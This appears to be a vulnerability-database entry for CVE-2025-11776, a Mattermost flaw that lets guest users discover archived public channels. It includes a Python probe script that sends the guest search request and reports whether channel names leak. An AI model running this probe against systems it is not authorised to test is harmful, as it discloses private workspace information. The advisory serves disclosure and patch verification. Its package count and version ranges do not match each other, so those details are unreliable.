CVE-2025-11776: Incorrect Authorization in Mattermost

Severity: 4.3 MEDIUM (NVD)
EPSS: 0.0% (top 90.65%)
CISA KEV: Not in KEV
Exploit: No known exploits
Timeline: Published 2025-11-14, latest update 2025-11-17

Description

Mattermost versions <11 fail to properly restrict access to the archived channel search API, which allows guest users to discover archived public channels via the `/api/v4/teams/{team_id}/channels/search_archived` endpoint. Guest accounts are meant to see only the channels they have been explicitly added to, so an unrestricted search lets a guest learn the names of archived public channels they were never a member of. The impact is disclosure only (CVSS C:L, I:N): the guest gains no write access.
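A check for this condition, as an added example (not code from this page or from Mattermost): it issues the request a guest would send to the endpoint named above and classifies the answer. The request shape (POST, JSON `term` body, bearer token), the channel fields `type` and `delete_at`, and the `"O"` public-channel type are assumptions taken from the Mattermost v4 API as I understand it; the sample response is constructed. A 403 means the server refused the guest; a 200 that lists archived public channels reproduces the advisory's condition; an empty 200 is inconclusive, because the fix may filter silently or the team may simply have no matching archived channels.

```python
"""Probe for CVE-2025-11776: can a guest token enumerate archived public
channels through the search_archived endpoint?  Added example, not
Mattermost code; request shape and field names are assumptions."""
import json
import sys
import urllib.error
import urllib.request

# Endpoint named in the advisory.
SEARCH_ARCHIVED = "/api/v4/teams/{team_id}/channels/search_archived"

# Mattermost channel types (assumed): "O" = public/open, "P" = private.
PUBLIC = "O"


def build_request(base_url, team_id, token, term):
    """Return (url, headers, body) for the guest's search call.

    Assumption: POST with a JSON {"term": ...} body and a bearer token,
    like the other Mattermost v4 channel-search endpoints.
    """
    url = base_url.rstrip("/") + SEARCH_ARCHIVED.format(team_id=team_id)
    headers = {
        "Authorization": "Bearer " + token,
        "Content-Type": "application/json",
    }
    body = json.dumps({"term": term}).encode("utf-8")
    return url, headers, body


def classify(status, payload):
    """Map the guest's (status, decoded JSON) to a verdict and channel names.

    403                               -> "restricted": server refused the guest.
    200 with archived public channels -> "vulnerable": the guest discovered
                                         channels it was never a member of.
    200 with nothing, anything else   -> "inconclusive": the fix may filter
                                         silently, or there is nothing to find.
    """
    if status == 403:
        return "restricted", []
    if status != 200 or not isinstance(payload, list):
        return "inconclusive", []
    # Defensive filter: only count channels that really are archived
    # (delete_at > 0) and public, which is what the advisory is about.
    leaked = [
        c.get("name", "")
        for c in payload
        if c.get("type") == PUBLIC and c.get("delete_at", 0) > 0
    ]
    return ("vulnerable", leaked) if leaked else ("inconclusive", [])


def probe(base_url, team_id, guest_token, term="", opener=urllib.request.urlopen):
    """Run the check against a live server using a guest account's token.

    `opener` is injectable so the logic can be exercised offline.
    """
    url, headers, body = build_request(base_url, team_id, guest_token, term)
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        with opener(req) as resp:
            status = resp.status
            payload = json.loads(resp.read().decode("utf-8"))
    except urllib.error.HTTPError as err:
        status, payload = err.code, None
    return classify(status, payload)


# Constructed sample of an unpatched (<11) server's answer to a guest:
# archived public channels (delete_at > 0, type "O") the guest never joined.
SAMPLE_UNPATCHED_RESPONSE = [
    {"id": "c1", "name": "old-incident-2023", "type": "O",
     "delete_at": 1700000000000},
    {"id": "c2", "name": "legacy-vendor", "type": "O",
     "delete_at": 1690000000000},
]


if __name__ == "__main__":
    if len(sys.argv) == 4:
        # usage: python check.py https://mm.example TEAM_ID GUEST_TOKEN
        print(probe(sys.argv[1], sys.argv[2], sys.argv[3]))
    else:
        print(classify(200, SAMPLE_UNPATCHED_RESPONSE))
        # -> ('vulnerable', ['old-incident-2023', 'legacy-vendor'])
```

Run it with a token belonging to a guest account on a test team that contains at least one archived public channel the guest was never a member of; an empty search term is deliberate, so that any matching channel is returned rather than only those with a guessed name.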

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N (Exploitability: 2.8 | Impact: 1.4)

Affected Packages (7 packages)

Go: github.com/mattermost_mattermost < 5.3.2-0.20250815165020-c8d66301415d
Go: github.com/mattermost_mattermost-server < 5.3.2-0.20250815165020-c8d66301415d
Go: github.com/mattermost_mattermost-server_v5 < 5.3.2-0.20250815165020-c8d66301415d
Go: github.com/mattermost_mattermost-server_v6 < 5.3.2-0.20250815165020-c8d66301415d

🔴 Vulnerability Details

References:

OSV: Mattermost fails to properly restrict access to archived channel search API in github.com/mattermost/mattermost (2025-11-17)
CVEList: Guest user can discover archived public channels (2025-11-14)
OSV: Mattermost fails to properly restrict access to archived channel search API (2025-11-14)
GHSA: Mattermost fails to properly restrict access to archived channel search API (2025-11-14)

Source: cvebase